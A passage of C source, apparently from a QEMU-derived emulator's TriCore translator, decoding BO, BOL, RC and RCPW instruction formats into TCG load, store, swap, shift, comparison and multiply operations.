OPC2_32_BO_LD_H_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LESW); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_H_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LESW); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_HU_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_HU_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_Q_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_Q_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_W_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_W_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); } static void decode_bo_addrmode_stctx_post_pre_base(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int r1, r2; TCGv temp, temp2; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_BO_LDLCX_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_helper_ldlcx(tcg_ctx, tcg_ctx->cpu_env, temp); break; case OPC2_32_BO_LDMST_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_ldmst(ctx, r1, temp); break; case OPC2_32_BO_LDMST_POSTINC: gen_ldmst(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LDMST_PREINC: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); gen_ldmst(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_BO_LDUCX_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_helper_lducx(tcg_ctx, tcg_ctx->cpu_env, temp); break; case OPC2_32_BO_LEA_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_STLCX_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_helper_stlcx(tcg_ctx, tcg_ctx->cpu_env, temp); break; case OPC2_32_BO_STUCX_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_helper_stucx(tcg_ctx, tcg_ctx->cpu_env, temp); break; case OPC2_32_BO_SWAP_W_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_swap(ctx, r1, temp); break; case OPC2_32_BO_SWAP_W_POSTINC: gen_swap(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_SWAP_W_PREINC: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); gen_swap(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_BO_CMPSWAP_W_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_cmpswap(ctx, r1, temp); break; case OPC2_32_BO_CMPSWAP_W_POSTINC: gen_cmpswap(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_CMPSWAP_W_PREINC: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); gen_cmpswap(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_BO_SWAPMSK_W_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_swapmsk(ctx, r1, temp); break; case OPC2_32_BO_SWAPMSK_W_POSTINC: gen_swapmsk(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_SWAPMSK_W_PREINC: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); gen_swapmsk(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void decode_bo_addrmode_ldmst_bitreverse_circular(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int r1, r2; TCGv temp, temp2, temp3; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_const_i32(tcg_ctx, off10); CHECK_REG_PAIR(r2); tcg_gen_ext16u_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2+1]); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); switch (op2) { case OPC2_32_BO_LDMST_BR: gen_ldmst(ctx, r1, temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LDMST_CIRC: gen_ldmst(ctx, r1, temp2); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_SWAP_W_BR: gen_swap(ctx, r1, temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_SWAP_W_CIRC: gen_swap(ctx, r1, temp2); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_CMPSWAP_W_BR: gen_cmpswap(ctx, r1, temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_CMPSWAP_W_CIRC: gen_cmpswap(ctx, r1, temp2); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_SWAPMSK_W_BR: gen_swapmsk(ctx, r1, temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_SWAPMSK_W_CIRC: gen_swapmsk(ctx, r1, temp2); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); } static void decode_bol_opc(DisasContext *ctx, int32_t op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1, r2; int32_t address; TCGv temp; r1 = MASK_OP_BOL_S1D(ctx->opcode); r2 = MASK_OP_BOL_S2(ctx->opcode); address = MASK_OP_BOL_OFF16_SEXT(ctx->opcode); switch (op1) { case OPC1_32_BOL_LD_A_LONGOFF: temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], address); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp, ctx->mem_idx, MO_LEUL); tcg_temp_free(tcg_ctx, temp); break; case OPC1_32_BOL_LD_W_LONGOFF: temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], address); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LEUL); tcg_temp_free(tcg_ctx, temp); break; case OPC1_32_BOL_LEA_LONGOFF: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], address); break; case OPC1_32_BOL_ST_A_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LEUL); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_ST_W_LONGOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LEUL); break; case OPC1_32_BOL_LD_B_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_SB); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_LD_BU_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_UB); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_LD_H_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LESW); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_LD_HU_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LEUW); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_ST_B_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_SB); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_ST_H_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LESW); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RC format */ static void decode_rc_logical_shift(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2; int32_t const9; TCGv temp; r2 = MASK_OP_RC_D(ctx->opcode); r1 = MASK_OP_RC_S1(ctx->opcode); const9 = MASK_OP_RC_CONST9(ctx->opcode); op2 = MASK_OP_RC_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RC_AND: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ANDN: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], ~const9); break; case OPC2_32_RC_NAND: tcg_gen_movi_tl(tcg_ctx, temp, const9); tcg_gen_nand_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_NOR: tcg_gen_movi_tl(tcg_ctx, temp, const9); tcg_gen_nor_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_OR: tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ORN: tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], ~const9); break; case OPC2_32_RC_SH: const9 = sextract32(const9, 0, 6); gen_shi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_H: const9 = sextract32(const9, 0, 5); gen_sh_hi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SHA: const9 = sextract32(const9, 0, 6); gen_shaci(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SHA_H: const9 = sextract32(const9, 0, 5); gen_sha_hi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SHAS: gen_shasi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_XNOR: tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RC_XOR: tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_rc_accumulator(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2; int16_t const9; TCGv temp; r2 = MASK_OP_RC_D(ctx->opcode); r1 = MASK_OP_RC_S1(ctx->opcode); const9 = MASK_OP_RC_CONST9_SEXT(ctx->opcode); op2 = MASK_OP_RC_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RC_ABSDIF: gen_absdifi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ABSDIFS: gen_absdifsi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADD: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADDC: gen_addci_CC(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADDS: gen_addsi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADDS_U: gen_addsui(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADDX: gen_addi_CC(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_AND_EQ: gen_accumulating_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_GE: gen_accumulating_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_LT: gen_accumulating_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_NE: gen_accumulating_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_EQ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_EQANY_B: gen_eqany_bi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_EQANY_H: gen_eqany_hi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_GE: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_LT: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MAX: tcg_gen_movi_tl(tcg_ctx, temp, const9); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_MAX_U: tcg_gen_movi_tl(tcg_ctx, temp, MASK_OP_RC_CONST9(ctx->opcode)); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_MIN: tcg_gen_movi_tl(tcg_ctx, temp, const9); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_MIN_U: tcg_gen_movi_tl(tcg_ctx, temp, MASK_OP_RC_CONST9(ctx->opcode)); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_NE: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_OR_EQ: gen_accumulating_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_GE: gen_accumulating_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_LT: gen_accumulating_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_NE: gen_accumulating_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_RSUB: tcg_gen_movi_tl(tcg_ctx, temp, const9); gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[r2], temp, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RC_RSUBS: tcg_gen_movi_tl(tcg_ctx, temp, const9); gen_subs(ctx, tcg_ctx->cpu_gpr_d[r2], temp, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RC_RSUBS_U: tcg_gen_movi_tl(tcg_ctx, temp, const9); gen_subsu(ctx, tcg_ctx->cpu_gpr_d[r2], temp, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RC_SH_EQ: gen_sh_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_GE: gen_sh_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_sh_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_LT: gen_sh_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_sh_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_NE: gen_sh_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_XOR_EQ: gen_accumulating_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_GE: gen_accumulating_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_LT: gen_accumulating_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_NE: gen_accumulating_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_rc_serviceroutine(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t const9; op2 = MASK_OP_RC_OP2(ctx->opcode); const9 = MASK_OP_RC_CONST9(ctx->opcode); switch (op2) { case OPC2_32_RC_BISR: gen_helper_1arg(tcg_ctx, bisr, const9); break; case OPC2_32_RC_SYSCALL: /* TODO: Add exception generation */ break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rc_mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2; int16_t const9; r2 = MASK_OP_RC_D(ctx->opcode); r1 = MASK_OP_RC_S1(ctx->opcode); const9 = MASK_OP_RC_CONST9_SEXT(ctx->opcode); op2 = MASK_OP_RC_OP2(ctx->opcode); switch (op2) { case OPC2_32_RC_MUL_32: gen_muli_i32s(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MUL_64: CHECK_REG_PAIR(r2); gen_muli_i64s(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r2+1], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MULS_32: gen_mulsi_i32(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MUL_U_64: const9 = MASK_OP_RC_CONST9(ctx->opcode); CHECK_REG_PAIR(r2); gen_muli_i64u(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r2+1], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MULS_U_32: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_mulsui_i32(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RCPW format */ static void decode_rcpw_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2; int32_t pos, width, const4; TCGv temp; op2 = MASK_OP_RCPW_OP2(ctx->opcode); r1 = MASK_OP_RCPW_S1(ctx->opcode); r2 = MASK_OP_RCPW_D(ctx->opcode); const4 = MASK_OP_RCPW_CONST4(ctx->opcode); width = MASK_OP_RCPW_WIDTH(ctx->opcode); pos = MASK_OP_RCPW_POS(ctx->opcode); switch (op2) { case OPC2_32_RCPW_IMASK: CHECK_REG_PAIR(r2); /* if pos + width > 32 undefined result */ if (pos + width <= 32) { tcg_gen_movi_tl(tcg_ctx, 